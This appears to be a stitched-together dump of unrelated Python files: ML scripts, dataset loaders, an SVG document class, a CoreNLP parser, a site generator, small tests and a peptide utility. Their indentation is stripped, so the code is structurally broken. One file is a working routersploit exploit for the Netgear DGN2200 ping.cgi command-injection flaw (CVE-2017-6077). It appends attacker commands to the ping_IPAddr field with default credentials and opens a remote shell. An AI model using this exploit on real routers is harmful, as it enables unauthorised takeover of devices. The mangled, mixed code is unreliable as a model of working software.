a = np.random.uniform(low=np.nextafter(0.0, 1.0))
row = np.random.randint(low=1, high=3)
if a < 2/3:
d = np.random.uniform(low=np.nextafter(0.0, 1.0))
if d < 1/2:
Q[0] = temp[row - 1][0]
Q[1:numbrk + 1] = np.ones(numbrk,dtype=int) * temp[row - 1][1]
else:
Q[0] = temp[row - 1][1]
Q[1:numbrk + 1] = np.ones(numbrk,dtype=int) * temp[row - 1][0]
else:
Q = q
s = np.concatenate((np.asarray([q[0]]), Q[:2]), axis=0)
elif np.any(np.absolute(k * np.ones(shape=(L+j)) - new) <= dist * np.ones(shape=(L+j,1))):
z = -3
bir = currentModel
kn = k
Q = q
s = 0
result = {"bir": bir, "kn": kn, "s": s, "Q": Q, "q": q, "z": z}
return result
if __name__ == "__main__":
df = read_excel("../data/artificial_data.xlsx", sheet_name='Sheet1')
u = []
for index, row in df.iterrows():
u.append([float(row['u'])])
u = np.asarray(u, dtype=np.float32)
dist = 30
numbrk = 5
currentModel = np.zeros(numbrk, dtype=np.uint32)
currentModel[numbrk - 1] = 50
q = np.ones(numbrk + 1, dtype=np.uint32)
result = birth(currentModel, u, dist, numbrk, q)
print(result)
|
|
|
|
|
|
from collections import Counter, defaultdict
import math
import numpy as np
import re
def avgstd(l): # Displays mean and variance
n = len(l)
# print 'computed over %d values' % n
mean = float(sum(l)) / n
var = float(sum(i * i for i in l)) / n - mean * mean
return '%.3f ± %.3f' % (round(mean, 3), round(1.96 * math.sqrt(var / (10 * n)), 3))
# return mean, round(1.96 * math.sqrt(var / n), 5)
def get_scores():
values = defaultdict(lambda: [])
logs = {}
with open('3-pdf-fisher') as f:
logs['fisher'] = f.read().splitlines()
with open('3-pdf-random') as f:
logs['random'] = f.read().splitlines()
with open('3-pdf-popular') as f:
logs['popular'] = f.read().splitlines()
r = re.compile('^([0-9]+) +([0-9]+) +([0-9]+) .*mobo=([0-9.]+), rmse=([0-9.]+),.*mobo=([0-9.]+), rmse=([0-9.]+),')
for model in logs.keys():
for line in logs[model]:
m = r.match(line)
if m:
user_id, _, t, train_mobo, train_rmse, test_mobo, test_rmse = m.groups()
t = int(t)
values[model, 'train_mobo', t].append(float(train_mobo))
values[model, 'train_rmse', t].append(float(train_rmse))
values[model, 'test_mobo', t].append(float(test_mobo))
values[model, 'test_rmse', t].append(float(test_rmse))
BUDGET = 10
for t in range(BUDGET):
for quantity in ['test_mobo', 'test_rmse']: # 'train_mobo', 'train_rmse',
for model in logs.keys():
print(t, quantity, model, avgstd(values[model, quantity, t]))
return values
|
|
|
|
|
|
import glob
import torch
from PIL import Image
from torch.utils.data import Dataset
from utils import download_and_extract
class CelebA(Dataset):
"""CelebA dataset."""
url="https://github.com/akanametov/dcgan-pytorch/releases/download/1.0/celeba.zip"
def __init__(self, root, download=False, transform=None):
if download:
_ = download_and_extract(root, self.url)
self.root=root
self.files=sorted(glob.glob(f"{root}/celeba/img_align_celeba/*.jpg"))
self.transform=transform
self.download=download
def __len__(self,):
return len(self.files)
def __getitem__(self, idx):
img = Image.open(self.files[idx]).convert('RGB')
if self.transform:
img = self.transform(img)
return img, torch.tensor([0]).long()
class LSUN(Dataset):
"""LSUN(bedroom) dataset."""
url="https://github.com/akanametov/dcgan-pytorch/releases/download/1.0/lsun.zip"
def __init__(self, root, download=False, transform=None):
if download:
_ = download_and_extract(root, self.url)
self.root=root
self.files=sorted(glob.glob(f"{root}/lsun/bedroom/0/*/*/*.jpg"))
self.transform=transform
self.download=download
def __len__(self,):
return len(self.files)
def __getitem__(self, idx):
img = Image.open(self.files[idx]).convert('RGB')
if self.transform:
img = self.transform(img)
return img, torch.tensor([0]).long()
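# A minimal usage sketch (illustrative; the root path is a placeholder and the
# archive is assumed to be extracted already, hence download=False).
if __name__ == "__main__":
    import torchvision.transforms as T
    from torch.utils.data import DataLoader

    transform = T.Compose([T.Resize(64), T.CenterCrop(64), T.ToTensor()])
    dataset = CelebA(root="./data", download=False, transform=transform)
    loader = DataLoader(dataset, batch_size=128, shuffle=True)
    images, _ = next(iter(loader))
    print(images.shape)  # torch.Size([128, 3, 64, 64])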
|
|
sciencebeam_gym/structured_document/svg.py
|
elifesciences/sciencebeam-gym
|
|
|
from sciencebeam_utils.utils.xml import (
set_or_remove_attrib
)
from sciencebeam_gym.utils.bounding_box import (
BoundingBox
)
from sciencebeam_gym.structured_document import (
AbstractStructuredDocument,
get_scoped_attrib_name,
get_attrib_by_scope
)
SVG_NS = 'http://www.w3.org/2000/svg'
SVG_NS_PREFIX = '{' + SVG_NS + '}'
SVG_DOC = SVG_NS_PREFIX + 'svg'
SVG_TEXT = SVG_NS_PREFIX + 'text'
SVG_G = SVG_NS_PREFIX + 'g'
SVG_RECT = SVG_NS_PREFIX + 'rect'
SVG_VIEWBOX_ATTRIB = 'viewBox'
SVG_TAG_ATTRIB = 'class'
SVGE_NS = 'http://www.elifesciences.org/schema/svge'
SVGE_NS_PREFIX = '{' + SVGE_NS + '}'
SVGE_BOUNDING_BOX = SVGE_NS_PREFIX + 'bounding-box'
SCOPED_TAG_ATTRIB_SUFFIX = 'tag'
SVG_NSMAP = {
None: SVG_NS,
'svge': SVGE_NS
}
class SvgStyleClasses(object):
LINE = 'line'
BLOCK = 'block'
LINE_NO = 'line_no'
def format_bounding_box(bounding_box):
return '%s %s %s %s' % (bounding_box.x, bounding_box.y, bounding_box.width, bounding_box.height)
def parse_bounding_box(bounding_box_str):
if not bounding_box_str:
return None
x, y, width, height = bounding_box_str.split()
return BoundingBox(float(x), float(y), float(width), float(height))
def get_node_bounding_box(t):
attrib = t.attrib
if SVGE_BOUNDING_BOX in attrib:
return parse_bounding_box(attrib[SVGE_BOUNDING_BOX])
if SVG_VIEWBOX_ATTRIB in attrib:
return parse_bounding_box(attrib[SVG_VIEWBOX_ATTRIB])
if not ('font-size' in attrib and 'x' in attrib and 'y' in attrib):
return None
font_size = float(attrib['font-size'])
width = font_size * 0.8 * max(1, len(t.text))
return BoundingBox(
float(attrib['x']),
float(attrib['y']),
width,
font_size
)
def _get_tag_attrib_name(scope, level):
return (
SVGE_NS_PREFIX + get_scoped_attrib_name(SCOPED_TAG_ATTRIB_SUFFIX, scope=scope, level=level)
if scope or level
else SVG_TAG_ATTRIB
)
class SvgStructuredDocument(AbstractStructuredDocument):
def __init__(self, root_or_roots):
if isinstance(root_or_roots, list):
self.page_roots = root_or_roots
else:
self.page_roots = [root_or_roots]
def get_pages(self):
return self.page_roots
def get_lines_of_page(self, page):
return page.findall('.//{}[@class="{}"]'.format(SVG_G, SvgStyleClasses.LINE))
def get_tokens_of_line(self, line):
return line.findall('./{}'.format(SVG_TEXT))
def get_x(self, parent):
return parent.attrib.get('x')
def get_text(self, parent):
return parent.text
def get_tag(self, parent, scope=None, level=None):
return parent.attrib.get(_get_tag_attrib_name(scope, level))
def set_tag(self, parent, tag, scope=None, level=None):
set_or_remove_attrib(parent.attrib, _get_tag_attrib_name(scope, level), tag)
def get_tag_by_scope(self, parent):
d = {
k[len(SVGE_NS_PREFIX):]: v
for k, v in get_attrib_by_scope(parent.attrib, SCOPED_TAG_ATTRIB_SUFFIX).items()
if k.startswith(SVGE_NS_PREFIX)
}
tag = self.get_tag(parent)
if tag:
d[None] = tag
return d
def get_bounding_box(self, parent):
return get_node_bounding_box(parent)
def set_bounding_box(self, parent, bounding_box):
parent.attrib[SVGE_BOUNDING_BOX] = format_bounding_box(bounding_box)
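# A small round-trip sketch for the bounding-box helpers above (illustrative
# only; BoundingBox is assumed to take x, y, width, height positionally, as in
# parse_bounding_box).
if __name__ == '__main__':
    box_str = format_bounding_box(BoundingBox(10.0, 20.0, 100.0, 15.0))
    print(box_str)                      # '10.0 20.0 100.0 15.0'
    print(parse_bounding_box(box_str))  # BoundingBox with the same values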
|
|
scripts_modules/colab_random_forest_regression.py
|
annapav7/NO2-tropomi_prediction_analysis
|
|
|
# -*- coding: utf-8 -*-
"""CoLab_Random Forest Regression.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1E4NOi3axBwvIHXiR47OKAAPzPMytJywY
# NO2 Prediction by using Machine Learning Regression Analyses in Google Earth Engine
## **Machine Learning can create a Model to Predict specific value base on existing data set (dependent and independent values).**
## **Introduction**
### **Nitrogen Dioxide (NO2) air pollution**.
The World Health Organization estimates that air pollution kills 4.2 million people every year.
The main effect of breathing in raised levels of NO2 is the increased likelihood of respiratory problems. NO2 inflames the lining of the lungs, and it can reduce immunity to lung infections.
There are links between respiratory disease, greater vulnerability to viral infections, and more severe outcomes.
##### ***Sources of NO2***:
Rapid population growth and fast urbanization, in particular:
* Industrial facilities
* Fossil fuels (coal, oil and gas)
* Growth of transportation – 80 %.
Air pollution (NO2) affects population health and contributes to global warming.
## **Objective**
The aim of this project is to create a model to predict a specific value (NO2) for past years, based on an existing data set (Landsat and Sentinel-5P (TROPOMI) images) for 2019. These predictions can be used for monitoring and statistical analysis of how NO2 develops over time.
"""
"""## **DataSet:**
The Sentinel-5P satellite with TROPOspheric Monitoring Instrument (TROPOMI) instrument provides high spectral resolution (7x3.5 km2) for all spectral bands to register level of NO2.
TROPOMI available from October 13, 2017.
The Landsat satellite program launched in 1972, and images are available for more than 40 years.
## **Concept:**
Regression:
The model can make generalizations about new data. The model has been learned from the training data, and can be used to predict the result of test data: here, we might be given an x-value, and the model would allow us to predict the y value. By drawing this separating line, we have learned a model which can generalize to new data.
## 1._ Install libraries
"""
!pip install earthengine-api
"""## 2._ Establish connection"""
!earthengine authenticate
"""**`Complete End to End Python code for Random Forest Regression:`**"""
# Import necessary Libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import rasterio as rio
from rasterio.plot import show
# Import the data ( CSV formats)
data = pd.read_csv('name_of_file.csv')
data.head()
# Store the Data in form of dependent and independent variables separately
X = data.iloc[:, 0:1].values
y = data.iloc[:, 1].values
# Import the Random Forest Regressor
from sklearn.ensemble import RandomForestRegressor
# Split the data into training and test sets (the 80/20 split below is an
# assumption; the original notebook uses X_train/X_test without defining them)
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
# Create a Random Forest Regressor object from the RandomForestRegressor class
RFReg = RandomForestRegressor(n_estimators = 100, random_state = 0)
# Fit the random forest regressor with Training Data represented by X_train and y_train
RFReg.fit(X_train, y_train)
#Predicted NO2 from test dataset w.r.t Random Forest Regression
y_predict_rfr = RFReg.predict((X_test))
#Model Evaluation using R-Square for Random Forest Regression
from sklearn import metrics
r_square = metrics.r2_score(y_test, y_predict_rfr)
print('R-Square Error associated with Random Forest Regression is:', r_square)
''' Visualise the Random Forest Regression by creating range of values from min value of X_train to max value of X_train
having a difference of 0.01 between two consecutive values'''
X_val = np.arange(min(X_train), max(X_train), 0.01)
#Reshape the data into a len(X_val)*1 array in order to make a column out of the X_val values
X_val = X_val.reshape((len(X_val), 1))
#Define a scatter plot for training data
plt.scatter(X_train, y_train, color = 'blue')
#Plot the predicted data
plt.plot(X_val, RFReg.predict(X_val), color = 'red')
#Define the title
plt.title('NO2 prediction using Random Forest Regression')
#Define X axis label
plt.xlabel('NDVI')
#Define Y axis label
plt.ylabel('Level of NO2')
#Set the size of the plot for better clarity
plt.figure(figsize=(1,1))
#Draw the plot
plt.show()
# Predicting NO2 for a single predictor value using Random Forest Regression
no2_pred = RFReg.predict([[41]])
print("Predicted NO2: %d" % no2_pred)
"""**Model Evaluation**"""
#Model Evaluation using Mean Square Error (MSE)
print('Mean Squared Error:', metrics.mean_squared_error(y_test, y_predict_rfr))
#Model Evaluation using Root Mean Square Error (RMSE)
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test, y_predict_rfr)))
#Model Evaluation using Mean Absolute Error (MAE)
print('Mean Absolute Error:', metrics.mean_absolute_error(y_test, y_predict_rfr))
#Model Evaluation using R-Square
from sklearn import metrics
r_square = metrics.r2_score(y_test, y_predict_rfr)
print('R-Square Error:', r_square)
#For Illustration Purpose Only.
#Considering Multiple Linear Equation with two Variables : grade = a0 + a1*time_to_study + a2*class_participation
#Model Evaluation using Adjusted R-Square.
# Here n = no. of observations and p = no. of independent variables
n = 50
p = 2
Adj_r_square = 1-(1-r_square)*(n-1)/(n-p-1)
print('Adjusted R-Square Error:', Adj_r_square)
|
|
|
|
|
|
import sys
import fileinput
import argparse
import time
from collections import defaultdict, Counter
import itertools
import pickle
import os
import codecs
from intervaltree import Interval, IntervalTree
from DataLoad import *
from SentenceModel import *
from java.util import *
from edu.stanford.nlp.pipeline import *
from edu.stanford.nlp.ling.CoreAnnotations import *
from edu.stanford.nlp.semgraph.SemanticGraphCoreAnnotations import *
pipeline = None
def getPipeline():
global pipeline
if pipeline is None:
props = Properties()
props.put("annotators", "tokenize, ssplit, pos, lemma, depparse");
pipeline = StanfordCoreNLP(props, False)
return pipeline
def within(pos,start,end):
return pos > start and pos < end
from __builtin__ import zip # To deal with Jython conflict with java Zip package
def parseTextWithTriggers(text,denotations,doTokenPreprocessing,knownEntities):
pipeline = getPipeline()
denotationTree = IntervalTree()
for id,(_,positions,_) in denotations.iteritems():
for a,b in positions:
denotationTree[a:b] = id
if doTokenPreprocessing:
prefixes = ["anti","phospho","translocation"]
prefixes += [ s[0].upper()+s[1:] for s in prefixes ]
suffixes = ["bound","degradable","driven","expressed","induced","induction","localized","luciferase","mediated","mediated way","nuclear","perforin","phosphorylated","Producing","promoter","promoting","secreting","silencing","simulated","transfected","translocation","costimulated","positve","regulated","responsive","independent","inducing","phosphorylation","stimulated","catalyzed","dimerization","expression","activated","reconstituted","associated","expressing","negative","producing","binding","positive","mediated","dependent","induced","deficient","protein","treatment"]
suffixes += [ s[0].upper()+s[1:] for s in suffixes ]
#print suffixes
for prefix in prefixes:
text = text.replace(prefix+"-",prefix+" ")
for suffix in suffixes:
text = text.replace("-"+suffix," "+suffix)
newTokens = []
position = 0
for tmpToken in text.split(' '):
startPos = position
endPos = position + len(tmpToken)
splitToken = None
triggers = denotationTree[startPos:endPos]
for interval in triggers:
if within(interval.begin,startPos,endPos):
#print word, interval, startPos, endPos, text[interval.begin:interval.end] #denotations[interval.data]
#print "COOLA1\t%s\t%s" % (tmpToken,text[interval.begin:interval.end])
tmpSplitToken = text[interval.begin-1]
if tmpSplitToken in ['-','/']:
splitToken = tmpSplitToken
break
#print separator
elif within(interval.end,startPos,endPos):
#print "COOLA2\t%s\t%s" % (tmpToken,text[interval.begin:interval.end])
tmpSplitToken = text[interval.end]
if tmpSplitToken in ['-','/']:
splitToken = tmpSplitToken
break
#print tmpSplitToken
position += len(tmpToken) + 1
if splitToken is None:
newTokens.append(tmpToken)
else:
newTokens += tmpToken.split(splitToken)
text = u" ".join(newTokens)
allSentenceData = []
#print text
document = pipeline.process(text)
for sentence in document.get(SentencesAnnotation):
tokens = []
triggerLocations = defaultdict(list)
for i,token in enumerate(sentence.get(TokensAnnotation)):
word = token.word()
lemma = token.lemma()
partofspeech = token.tag()
startPos = token.beginPosition()
endPos = token.endPosition()
t = Token(word,lemma,partofspeech,startPos,endPos)
tokens.append(t)
triggers = denotationTree[startPos:endPos]
for interval in triggers:
triggerID = interval.data
triggerLocations[triggerID].append(i)
#if within(interval.begin,startPos,endPos) or within(interval.end,startPos,endPos):
#if within(interval.begin,startPos,endPos):
#print word, interval, startPos, endPos, text[interval.begin:interval.end] #denotations[interval.data]
#print "COOL1\t%s\t%s" % (word,text[interval.begin:interval.end])
#elif within(interval.end,startPos,endPos):
#print "COOL2\t%s\t%s" % (word,text[interval.begin:interval.end])
#print "-"*30
#print sentence
#sys.exit(0)
#dparse = sentence.get(BasicDependenciesAnnotation)
dparse = sentence.get(CollapsedCCProcessedDependenciesAnnotation)
dependencies = []
# Get the dependency graph
for edge in dparse.edgeIterable():
governor = edge.getGovernor()
governorIndex = governor.index()
dependent = edge.getDependent()
dependentIndex = dependent.index()
rel = edge.getRelation().getLongName()
dependencies.append((governorIndex-1, dependentIndex-1, rel))
# Let's gather up the information about the "known" triggers in the sentence (those from the A1 file)
eventTriggerLocs, eventTriggerTypes, argumentTriggerLocs, argumentTriggerTypes = {},{},{},{}
for triggerID,locs in triggerLocations.iteritems():
# Trigger is following tuple (typeName, positions, tokens)
triggerType,_,_ = denotations[triggerID]
if knownEntities is None or triggerType in knownEntities:
argumentTriggerLocs[triggerID] = locs
argumentTriggerTypes[triggerID] = triggerType
else:
eventTriggerLocs[triggerID] = locs
eventTriggerTypes[triggerID] = triggerType
sentenceData = SentenceModel(tokens, dependencies, eventTriggerLocs, eventTriggerTypes, argumentTriggerLocs, argumentTriggerTypes)
allSentenceData.append(sentenceData)
return allSentenceData
def findEventTrigger(sentenceData,triggerid):
for sentenceid, sentence in enumerate(sentenceData):
if triggerid in sentence.predictedEntityLocs:
return sentenceid,sentence.predictedEntityLocs[triggerid]
raise RuntimeError('Unable to find location of event trigger ID ('+triggerid+') in sentences')
def findArgumentTrigger(sentenceData, triggerid):
for sentenceid, sentence in enumerate(sentenceData):
if triggerid in sentence.knownEntityLocs:
return sentenceid,sentence.knownEntityLocs[triggerid]
raise RuntimeError('Unable to find location of argument trigger ID ('+triggerid+') in sentences')
def isComplexEvent(eventTrigger,arguments):
if eventTrigger[0] == 'E':
return True
for _,id in arguments.iteritems():
if id[0] == 'E':
return True
return False
#def associatedEvents(sentenceData,events,modifiers,coreferences,equivalences):
# nonCom
# complexEvents = []
# for eventid,event in events.iteritems():
# (eventName, eventTrigger, arguments) = event
# isComplexEvent = False
# Event(eventName,
# It's the main bit. Yay!
if __name__ == "__main__":
argparser = argparse.ArgumentParser(description='Text parsing pipeline for a directory of text in ST or JSON format')
argparser.add_argument('--inDir', required=True, type=str, help='Directory containing input files')
argparser.add_argument('--format', default="ST", type=str, help='Format to load files (ST/JSON, default=ST)')
argparser.add_argument('--splitTokensForGE4', action='store_true', help='Whether to split tokens using GE4 logic')
argparser.add_argument('--knownEntities', help='Comma-separated list of entities that are known through-out')
argparser.add_argument('--outFile', required=True, type=str, help='Output filename for parsed-text data')
args = argparser.parse_args()
assert args.format == "ST" or args.format == "JSON", "--format must be ST or JSON"
inDir = args.inDir
outFile = args.outFile
print "inDir:", inDir
print "outFile:", outFile
if inDir[-1] != '/':
inDir = inDir + '/'
splitTokensForGE4 = False
if args.splitTokensForGE4:
splitTokensForGE4 = True
knownEntities = None
if args.knownEntities:
knownEntities = set(args.knownEntities.split(","))
allSentenceAndEventData = {}
for filename in os.listdir(inDir):
if args.format == "ST" and filename.endswith(".txt"):
filenameNoExt = filename[:-4]
prefix = inDir + filenameNoExt
txtFile = prefix + '.txt'
a1File = prefix + '.a1'
a2File = prefix + '.a2'
print "### Processing %s ###" % txtFile
assert os.path.exists(a1File), "Cannot find file: %s" % a1File
text,denotations,relations,modifications = loadDataFromSTFormat(txtFile,a1File,a2File)
sentenceData = parseTextWithTriggers(text,denotations,splitTokensForGE4,knownEntities)
allSentenceAndEventData[filenameNoExt] = (sentenceData,relations,modifications)
elif args.format == "JSON" and filename.endswith(".json"):
filenameNoExt = filename[:-5]
jsonFile = inDir + filenameNoExt + '.json'
print "### Processing %s ###" % jsonFile
text,denotations,relations,modifications = loadDataFromJSON(jsonFile)
sentenceData = parseTextWithTriggers(text,denotations,splitTokensForGE4,knownEntities)
allSentenceAndEventData[filenameNoExt] = (sentenceData,relations,modifications)
with open(outFile, 'w') as f:
pickle.dump(allSentenceAndEventData, f)
print "Written to " + outFile
|
|
|
|
|
|
"""Generate site in output directory."""
from contextlib import contextmanager
import json
from pathlib import Path
from shutil import copytree, move, rmtree
from sqlite3 import Connection
import typing as t
from .app import App
from .graph import (
create_graph,
create_graph_data,
get_cluster,
get_components,
get_note_titles,
)
from .page import generate_index
from .utils import temporary_directory
data = Path(__file__).parent/"data"
Generator = t.Callable[[Path], None]
def clear(directory: Path) -> None:
"""Clear contents of directory.
Create directory if it doesn't exist.
"""
directory.mkdir(exist_ok=True)
for child in directory.iterdir():
if child.is_dir():
rmtree(child, ignore_errors=True)
else:
child.unlink()
@contextmanager
def output_directory_proxy(path: Path) -> t.Iterator[Path]:
"""Create proxy for output directory.
Afterwards path is emptied and all contents of tempdir are moved into path.
"""
assert not path.exists() or path.is_dir()
with temporary_directory() as tempdir:
yield tempdir
clear(path)
for child in tempdir.iterdir():
move(str(child), str(path))
class IndexGenerator:
"""Generates index.html."""
def __init__(self, app: App):
self.app = app
def run(self, out: Path) -> None:
"""Generate index.html inside output directory."""
generate_index(self.app, out)
def copy(source: Path, dest: Path) -> None:
"""Copy text from source to dest Path."""
dest.write_bytes(source.read_bytes())
def generate_js(out: Path) -> None:
"""Generate app.js inside output directory."""
copy(data/"app.min.js", out/"app.min.js")
def generate_css(out: Path) -> None:
"""Generates style.css"""
copy(data/"app.min.css", out/"app.min.css")
copy(data/"style.css", out/"style.css")
def generate_favicons(out: Path) -> None:
"""Copy favicons."""
for path in data.joinpath("favicons").iterdir():
if path.name != "about.txt":
copy(path, out/path.name)
def copy_boxicons(out: Path) -> None:
"""Copy boxicons svgs."""
copytree(data/"svg", out/"assets"/"boxicons"/"svg")
def copy_mathjax(out: Path) -> None:
"""Copy mathjax files."""
copytree(data/"es5", out/"es5")
class ImagesGenerator:
"""Copies images from database into output directory."""
def __init__(self, con: Connection):
self.con = con
def run(self, out: Path) -> None:
"""Copy images into output directory."""
(out/"images").mkdir()
sql = "SELECT filename, binary FROM Images"
for filename, binary in self.con.execute(sql):
image = out/filename
image.write_bytes(binary)
class CytoscapeDataGenerator:
"""Generate JSONs for cytoscape.js."""
def __init__(self, con: Connection):
self.con = con
self.graph = create_graph(con)
self.titles = dict(get_note_titles(self.con))
def write(self, path: Path, graph: t.Any, layout: str = "fdp") -> None: # noqa; # pylint: disable=no-self-use
"""Write graph JSON data to path."""
graph_data = create_graph_data(self.con, self.titles, graph, layout)
path.write_text(json.dumps(graph_data))
def run(self, out: Path) -> None:
"""Generate JSONs for cytoscape.js in out/graph."""
(out/"graph").mkdir()
layout = "dot" if self.graph.order() < 100 else "fdp"
self.write(out/"graph"/"data.json", self.graph, layout)
(out/"graph"/"tag").mkdir()
for tag, in self.con.execute("SELECT DISTINCT tag FROM Tags"):
path = out/"graph"/"tag"/f"{tag[1:]}.json"
self.write(path, get_cluster(self.graph, tag), "dot")
(out/"graph"/"note").mkdir()
for component, subgraph in get_components(self.graph).items():
graph_data = create_graph_data(
self.con,
self.titles,
subgraph,
"dot",
)
for note_id in component:
path = out/"graph"/"note"/f"{note_id}.json"
path.write_text(json.dumps(graph_data))
self.con.commit()
def compile_site(app: App) -> None:
"""Copy files into output directory."""
assert app.root is not None
con = app.database
output_directory = app.root/app.config.output_directory
with output_directory_proxy(output_directory) as tempdir:
CytoscapeDataGenerator(con).run(tempdir)
ImagesGenerator(con).run(tempdir)
IndexGenerator(app).run(tempdir)
generate_css(tempdir)
generate_js(tempdir)
generate_favicons(tempdir)
copy_boxicons(tempdir)
copy_mathjax(tempdir)
|
|
src/generated-spec/work_spaces.py
|
wheerd/cloudformation-to-terraform
|
|
|
from . import *
class AWS_WorkSpaces_Workspace_WorkspaceProperties(CloudFormationProperty):
def write(self, w):
with w.block("workspace_properties"):
self.property(w, "ComputeTypeName", "compute_type_name", StringValueConverter())
self.property(w, "RootVolumeSizeGib", "root_volume_size_gib", BasicValueConverter())
self.property(w, "RunningMode", "running_mode", StringValueConverter())
self.property(w, "RunningModeAutoStopTimeoutInMinutes", "running_mode_auto_stop_timeout_in_minutes", BasicValueConverter())
self.property(w, "UserVolumeSizeGib", "user_volume_size_gib", BasicValueConverter())
class AWS_WorkSpaces_Workspace(CloudFormationResource):
cfn_type = "AWS::WorkSpaces::Workspace"
tf_type = "aws_workspaces_workspace"
ref = "id"
attrs = {} # Additional TF attributes: computer_name, ip_address, state
def write(self, w):
with self.resource_block(w):
self.property(w, "BundleId", "bundle_id", StringValueConverter())
self.property(w, "DirectoryId", "directory_id", StringValueConverter())
self.property(w, "RootVolumeEncryptionEnabled", "root_volume_encryption_enabled", BasicValueConverter())
self.property(w, "Tags", "tags", ListValueConverter(ResourceTag()))
self.property(w, "UserName", "user_name", StringValueConverter())
self.property(w, "UserVolumeEncryptionEnabled", "user_volume_encryption_enabled", BasicValueConverter())
self.property(w, "VolumeEncryptionKey", "volume_encryption_key", StringValueConverter())
self.block(w, "WorkspaceProperties", AWS_WorkSpaces_Workspace_WorkspaceProperties)
|
|
Adder&Subtractor/adder+subtractor module/testbench& SW/adder-test.py
|
|
|
|
import sys
f = open("testfile.txt", "r")
out = open("test_out.txt", "w")
x = f.readline()
while x:
numbers = x.split()
A = numbers[0]
B = numbers[1]
result = bin(int(A,2) + int(B,2))
# out.write(A+"\n")
#out.write(B+"\n")
result = int(result,2)
result = str(result)
out.write(result+"\n")
x = f.readline()
out.close()
f.close()
|
|
Python/python code samples/test cases/FileTestSuite.py
|
|
|
|
import unittest
import os
class FileTestSuite(unittest.TestCase):
def test_if_file_exist(self):
path = r"C:\Ussers\Vince\Desktop\do_not_exist.txt"
self.assertFalse(os.path.isfile(path), 'The file should not exist')
def test_if_html_contains_div(self):
html = "<body><div>here</div></body>"
pos = html.find('<div>')
self.assertTrue(pos != -1, "The HTML does contain div's")
def test_if_html_does_not_contain_a_div(self):
html = "<body>walla walla washington</body>"
pos = html.find('<div>')
self.assertTrue(pos == -1, "The HTML does not contain div's")
def refactor(aList):
sum = 0
if len(aList) == 0:
return False, 0
for eachItem in aList:
isValidNumber = str(eachItem).isdigit()
if isValidNumber == False:
return False, 0
else:
sum = sum + eachItem
return True, sum
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(FileTestSuite))
return suite
|
|
DIZED_APPS/INCANTATION/modules/exploits/routers/netgear/dgn2200_ping_cgi_rce.py
|
tanc7/ArmsCommander-TestBed
|
|
|
from routersploit import (
exploits,
print_error,
print_success,
print_status,
mute,
validators,
http_request,
random_text,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploits Netgear DGN2200 RCE vulnerability in ping.cgi
"""
__info__ = {
'name': 'Netgear DGN2200 RCE',
'description': 'Exploits Netgear DGN2200 RCE vulnerability in the ping.cgi script',
'authors': [
'SivertPL', # vulnerability discovery
'<NAME> <<EMAIL>[at]<EMAIL>>', # routesploit module
],
'references': [
'https://www.exploit-db.com/exploits/41394/',
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6077',
],
'devices': [
'Netgear DGN2200v1',
'Netgear DGN2200v2',
'Netgear DGN2200v3',
'Netgear DGN2200v4',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target Port') # target port
login = exploits.Option('admin', 'Username')
password = exploits.Option('password', 'Password')
def run(self):
"""
Method run on "exploit" or "run" command (both works the same way). It should result in exploiting target.
"""
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsbe")
else:
print_error("Target is not vulnerable")
def execute(self, command):
url = "{}:{}/ping.cgi".format(self.target, self.port)
data = {'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command}
referer = "{}/DIAG_diag.htm".format(self.target)
headers = {'referer': referer}
r = http_request(method="POST", url=url, data=data, auth=(self.login, self.password), headers=headers)
if r is None:
return ""
result = self.parse_output(r.text)
return result.encode('utf-8')
def parse_output(self, text):
yet = False
result = []
for line in text.splitlines():
if line.startswith("<textarea"):
yet = True
continue
if yet:
if line.startswith("</textarea>"):
break
result.append(line)
return "\n".join(result)
@mute
def check(self):
"""
Method that verifies if the target is vulnerable.
"""
rand_marker = random_text(6)
command = "echo {}".format(rand_marker)
if rand_marker in self.execute(command):
return True
return False
|
|
antigen_discovery/nepitope/peptide_utilities.py
|
|
|
|
import os
import glob
from shutil import move, rmtree
from nepitope import net_MHC_interface
import importlib
importlib.reload(net_MHC_interface)
class Swaps(object):
list_AA = ['A', 'R', 'N', 'D', 'C', 'Q', 'E', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P', 'S', 'T', 'W', 'Y', 'V']
def __init__(self, high_affinity_df, fasta_file_dir, net_mhc_path, proteins=None):
self.df = high_affinity_df
self.protein_ids = self._get_prot_ids(proteins)
#self.protein_input_df = self.df[self.df.ID.isin(self.protein_ids)]
self.fasta_dir = fasta_file_dir
self.mhc_path = net_mhc_path
def find_swaps_write_to_fasta(self):
nmers = self._get_nmers(self.df)
alleles = self._get_alleles(self.df)
mhc_commands = []
for prot_id in self.protein_ids:
try:
os.mkdir(self.fasta_dir + '%s/' % prot_id)
except:
pass
for nmer in nmers:
for allele in alleles:
sliced = self._slice_df(nmer, allele, prot_id)
if self.check_size(sliced):
list_of_lists = sliced[['n-mer', 'Allele', 'ID', 'Pos', 'Peptide']].values.tolist()
for item in list_of_lists:
swaps = self._create_swaps(item[-1])
fasta_file = self._open_write_fasta(item, swaps, prot_id)
self._create_mhc_command(item, fasta_file)
self.reorg_files(prot_id)
return mhc_commands
def reorg_files(self, prot_id):
prot_dir = self.fasta_dir + '%s' % prot_id
dirs = glob.glob(prot_dir + '/mhc_preds*')
final_dest = prot_dir + '/preds_per_swap'
try:
os.mkdir(final_dest)
except:
pass
for i in dirs:
file_source = glob.glob(i + '/*.xls')
move(file_source[0], final_dest)
print('Swap predictions regrouped to %s' % final_dest)
for i in dirs:
rmtree(i)
def _create_mhc_command(self, item, fasta_location):
nmer = [item[0]]
allele = [item[1]]
net_mhc = net_MHC_interface.netMHCComand(self.mhc_path, fasta_location, nmers=nmer, alleles=allele)
net_mhc.create_text_command(write_to_txt=True)
net_mhc.run_netMHC()
def _open_write_fasta(self, data, swaps, prot_id):
